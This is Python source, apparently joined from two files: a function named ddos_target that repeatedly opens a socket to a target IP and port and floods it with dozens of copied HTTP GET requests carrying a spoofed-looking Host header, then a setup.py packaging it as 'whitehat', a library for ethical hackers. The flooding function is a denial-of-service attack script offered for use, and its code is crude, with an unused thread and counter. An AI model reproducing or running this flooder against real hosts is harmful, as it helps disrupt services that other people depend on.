import socket
import threading

def ddos_target(IP, PORT, duration):
    fake_ip = "182.21.20.32"
    for i in range(duration):
        thread = threading.Thread(target=IP)
        attack_num = 0
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
        print("Attack sent")
        s.close()


def start_ddos(function):
    function()



from setuptools import setup, find_packages

with open('README.md') as f:
    long_description = f.read()

def read_requirements():
    with open('requirements.txt', 'r') as req:
        content = req.read()
        requirements = content.split('\n')

    return requirements


setup(
    name='whitehat',
    version="0.0.1",
    author='LyQuid',
    author_email='lyquidpersonal@gmail.com',
    description = 'Python Library For Ethical Hacker',
    long_description=long_description,
    long_description_content_type='text/markdown',
    license='Apache License 2.0',
    url='https://github.com/EterNomm/Whitehat',
    packages=find_packages(),
    include_package_data=True,
    install_requires=read_requirements(),
    keywords=["python", "hacker", "whitehat", "hacker tool", "ethical hacker"]
)
